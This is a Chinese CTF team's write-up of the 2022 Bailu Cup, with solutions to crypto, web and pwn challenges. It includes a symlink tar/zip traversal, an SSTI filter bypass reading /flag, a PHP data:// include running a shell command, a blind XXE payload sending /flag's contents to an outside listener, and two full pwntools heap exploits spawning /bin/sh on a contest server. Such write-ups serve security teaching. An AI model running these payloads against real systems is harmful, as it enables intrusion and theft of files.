2022柏鹭杯WP–Polaris战队

Polaris北极星战队本次排名第5,共解出9道题

• 

• 问题描述的密文你会解密吗？：

• Can you help us decrypt this text?：

• Anti-Fermat？：

• Unzip

• ezPython

• babyinclude

• upload

• note1

• note2

  MISC

• 问题描述的密文你会解密吗？：

  
  

  
  

• Ak_TZh+&:.]v)W.*@DSiR5W#fR,q2G+<,]vin4QXX}?<UrJw;aG3^u[|m'AxJ@?Y1ksf0;mN

  题解：base 92 + base 64
  

  
  

  Crypto

• Can you help us decrypt this text?：

• 4d7a637a5a444d794d7a6730597a63344d6a51334e4463794e574d7a5a5463774d6a63304f5452694 d6a457a4d44597a4e7a417a4e5449324e445579596a59324d324d304d5451304d7a4133597a4d334d 7a51324d6a5a6d4e3251324e4451784d3259794e4463334e4455324f4449794e4755253344

  题解：16进制转ascii码→URL编码→base64→16进制转ascii码→ROT47
  

• Anti-Fermat？：

• import gmpy2 from Crypto.Util.number import *n = 0x31e22a7a2c5ec946692357dc51014a80530afeb46f419831fcbd896aa1d5cee2d0c69123b301706 7afdb3d82b2be3535aebdf11da0fa2b4873233bae6af8a1c2a9344b6f64ade1c6c48a2828130c3520 53e1729b850774589e8947c8c0a472a8dc90caa542da5cec7f5fa7581747dcb558300437c30b016f7 69d4a85af8584f311dfb2f9e87fa7d16eaccb0303ecba491619ec7dda72e4037d96c607e666eced58 2d6eb2c232689fce1c08a54b80cf6d39ef1f2b467d970998c6d54d1779979c89a3b301cd1435bde87 87d1141c912cf32b56610fba9205c6e86fefc490c8b2e06f5ed9f775f5b0fe945fa9fca3fc217b4c9 dcd4b26676f576d0273b79417b81 c = 0x118dd8ab5df8685c5db5b1242896df41e8e9016f5f16276b6d311b29f0e5f9315530574b51c6e7c 82d0c88ab92787d639443b921a452c850db580256ccfd55ee52ea9732821525da1d21351acb230a79 9ecaa1802c6f24487176c9cae537c3188e083552a84a2aebdd55c4014b41846768d7608970c1e52d9 a68e550ef8bb6016adb6f8e0672e1c8198a5442799a5b8142e8d0fadb6e6146a062ef906bd58c46f3 1bf65263b6142b1976773289dee408ae233b6c0c534dd5092bd7f331c3457971278d335923edc044b a88852680ee39d1cc84a66dc81b70039e2435892b11f310b490c872448f7a8dc718759b2052b0911f 758102a59c54dea061a8a3ff6879 e = 65537 t = 1<<1024 p = (t + gmpy2.iroot(t**2-4*n,2)[0])//2 p = int(p) while n%p != 0: p = gmpy2.next_prime(p) q = n//p phi = (p-1)*(q-1) d = gmpy2.invert(e,phi) m = pow(c,d,n) print(long_to_bytes(m))

  
  

• WEB

• Unzip

  
  

  原题参考：https://blog.huli.tw/2022/06/14/justctf-2022-writeup/

• ln -fs ../../../flag.txt .
  touch a
  zip a.zip -xi a
  tar –owner 0 –group 0 -cvf payload.tar flag.txt a.zip
  curl -v http://39.101.72.210:15294/extract -F ‘[email protected]’
  flag{ISEC-d58e25c04fa57421c6dcea179a82e63a}

• ezPython

  RSA e=3可以⽤脚本求得m

• import gmpy2 import binascii import libnum import time from Crypto.Util.number import long_to_bytes n=1851478021262580642928595377560904779895545412675798287739504119938273465008146 344499104457112003949823573169498346585187920428068257464253459159692301437090469 745971517442987726391626060256657274104766830088549554075741473960419307115916281 189769452661497378527933131975454067780057183810519746546508528541298070447527449 58017956968265805370399> e=3 res=0c=2457069489835781252073815422504964988160135660567467845177503131292606415319587 537967675850199183490864186237837358701137589617680705086633337350225534260979770 49927 for k in range(200000000): if gmpy2.iroot(c+n*k,3)[1]==1: res=gmpy2.iroot(c+n*k,3)[0] print(long_to_bytes(res)) break

  解得⽤户名和密码：
  admin
  Admin@!123#T1wsc14e!-mW
  登录进去 ⽂本框fuzz后，得知过滤了[]{}_'”
  可以⽤unicode绕过 ﹛﹛().＿＿class＿＿.＿＿bases＿＿［0］.＿＿subclasses＿＿()［177］.＿＿init＿＿.＿＿globals＿ ＿.＿＿builtins＿＿［＇open＇］(＇/flag＇).read()﹜﹜
  flag{ISEC-4a167c1cfed53e21c9e82e5e35576f56}
  

• babyinclude

  
  

• 

  
  

  然后访问0.php?file=data://,&content=data://textplain;base64,PD9waHAgc3lzdGV
  tKCJjYXQgL2ZsYWciKTs/Pg==

• upload

  扫⽬录发现 index.php ， 可以看到是 xxe 注⼊且⽆回显 思路是 XXE盲注 通过外带数据通道提取数据
  payload:

• <!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % hack SYSTEM "http://ip/123.dtd"> %hack; %dtd; %xxe;

  test.dtd
  

• <!ENTITY % dtd "<!ENTITY &#x25; xxe SYSTEM 'http://ip:3333/%file;'> ">

  服务器监听就有flag的base64
  （没有环境了，截图不了）
  

  PWN

• note1

• #!/usr/bin/python3 # -*- coding:utf-8 -*- from pwn import * import os, struct, random, time, sys, signal class Shell(): def __init__(self): self.clear(arch='amd64', os='linux', log_level='debug') # self.pipe = process(['./note1']) self.pipe = remote('39.101.72.210', 12031) def send(self, data:bytes, **params): return self.pipe.send(data, **params) def sendline(self, data:bytes, **params): return self.pipe.sendline(data, **params) def recv(self, **params): return   self.pipe.recv(**params) def close(self, **params): return self.pipe.close(**params) def recvrepeat(self, timeout, **params): return self.pipe.recvrepeat(timeout, **params) def interactive(self, **params): return self.pipe.interactive(**params) def clear(self, **params): return context.clear(**params) def recvn(self, numb, **params): result = self.pipe.recvn(numb, **params) if(len(result) != numb): raise EOFError('recvn') return result def recvuntil(self, delims, **params): result = self.pipe.recvuntil(delims, drop=False, **params) if(not result.endswith(delims)): raise EOFError('recvuntil') return result[:-len(delims)] def sendafter(self, delim, data, **params): self.recvuntil(delim, **params) self.send(data, **params) def sendlineafter(self, delim, data, **params): self.recvuntil(delim, **params) self.sendline(data, **params) def add(self, id, length, content, tag, func):     self.sendlineafter(b'> ', b'1')     self.sendlineafter(b'id: ', str(id).encode())     self.sendlineafter(b'name_length: ', str(length).encode())     self.sendlineafter(b'name: ', content)     self.sendlineafter(b'tag: ', tag)     self.sendlineafter(b'func: ', str(func).encode())def edit_tag(self, id, tag):     self.sendlineafter(b'> ', b'2')     self.sendlineafter(b'id: ', str(id).encode())     self.sendlineafter(b'> ', b'2')     self.sendlineafter(b'tag: ', tag) def edit_func(self, id, func):     self.sendlineafter(b'> ', b'2')     self.sendlineafter(b'id: ', str(id).encode())     self.sendlineafter(b'> ', b'3')     self.sendlineafter(b'func: ', str(func).encode()) def edit_buf(self, id, length, content):     self.sendlineafter(b'> ', b'2')     self.sendlineafter(b'id: ', str(id).encode())     self.sendlineafter(b'> ', b'1')     self.sendlineafter(b'name_length: ', str(length).encode())     self.sendlineafter(b'name: ', content) def func(self, id):     self.sendlineafter(b'> ', b'3')     self.sendlineafter(b'id: ', str(id).encode()) sh = Shell() sh.add(0, 0x500, b'b' * 0x100, b'', 1) sh.edit_tag(0, b'a' * 8) sh.edit_func(0, 1) sh.func(0) sh.recvuntil(b'a' * 8) image_base = u64(sh.recvn(6).ljust(8, b'')) - 0x131b success('image_base: ' + hex(image_base)) sh.edit_buf(0, 0x17, b'') sh.add(1, 0x17, b'', b'', 1) sh.edit_buf(0, 0x101, b'b' * 0x20 + p64(0) + p64(image_base + 0x131b) + p64(image_base + 0x3FA8)) sh.func(1) sh.recvuntil(b'name: ') libc_addr = u64(sh.recvn(6).ljust(8, b'')) - 0x61c90 success('libc_addr: ' + hex(libc_addr)) sh.edit_buf(0, 0x101, b'b' * 0x20 + b'/bin/sh' + p64(libc_addr + 0x52290)) sh.func(1) sh.interactive()

• note2

• #!/usr/bin/python3 # -*- coding:utf-8 -*- from pwn import * import os, struct, random, time, sys, signal class Shell():       def __init__(self):      self.clear(arch='amd64', os='linux', log_level='debug')       # self.pipe = process(['./note2'])       self.pipe = remote('39.101.72.210', 12032)def send(self, data:bytes, **params): return self.pipe.send(data, **params) def sendline(self, data:bytes, **params): return self.pipe.sendline(data, **params) def recv(self, **params): return self.pipe.recv(**params) def close(self, **params): return self.pipe.close(**params) def recvrepeat(self, timeout, **params): return self.pipe.recvrepeat(timeout, **params) def interactive(self, **params): return self.pipe.interactive(**params) def clear(self, **params): return context.clear(**params) def recvn(self, numb, **params):     result = self.pipe.recvn(numb, **params)     if(len(result) != numb):         raise EOFError('recvn')     return resultdef recvuntil(self, delims, **params):     result = self.pipe.recvuntil(delims, drop=False, **params)     if(not result.endswith(delims)):        raise EOFError('recvuntil')     return result[:-len(delims)]def sendafter(self, delim, data, **params):     self.recvuntil(delim, **params)     self.send(data, **params)def sendlineafter(self, delim, data, **params):     self.recvuntil(delim, **params)     self.sendline(data, **params)def add(self, index, size, content):     sh.sendlineafter(b'> ', b'1')     sh.sendlineafter(b'Index?', str(index).encode())     sh.sendlineafter(b'Size?', str(size).encode())     sh.sendlineafter(b'content: ', content)def delete(self, index):     sh.sendlineafter(b'> ', b'2')     sh.sendlineafter(b'Index?', str(index).encode()) def show(self, index):     sh.sendlineafter(b'> ', b'3')     sh.sendlineafter(b'Index?', str(index).encode()) sh = Shell() sh.add(0, 0x18, b'') sh.delete(0) sh.show(0) sh.recvuntil(b'> ') heap_addr = u64(sh.recvn(5).ljust(8, b'')) * 0x1000 success('heap_addr: ' + hex(heap_addr)) for i in range(9):      sh.add(i, 0x88, b'') for i in range(8):       sh.delete(i)sh.show(7) sh.recvuntil(b'> ') libc_addr = u64(sh.recvn(6).ljust(8, b'')) - 0x219ce0 success('libc_addr: ' + hex(libc_addr)) sh.delete(8) sh.add(0, 0x100, b'a' * 0x80 + p64(0) + p64(0x21)) sh.add(1, 0x18, b'') sh.delete(1) sh.delete(8) sh.delete(0) # offset = 0x26b2e0 offset = 0x2652e0 success('offset: ' + hex(offset)) sh.add(0, 0x100, b'a' * 0x80 + p64(0) + p64(0x21) + p64((heap_addr >> 12) ^ (libc_addr + offset))) sh.add(1, 0x18, p64(libc_addr + 0xebcf1)) sh.add(2, 0x18, p64(heap_addr + 0x740 - 0x3d78)) sh.sendlineafter(b'> ', b'4') sh.interactive()                           

• 

  
  

原文始发于微信公众号（星盟安全）：2022柏鹭杯WP–Polaris战队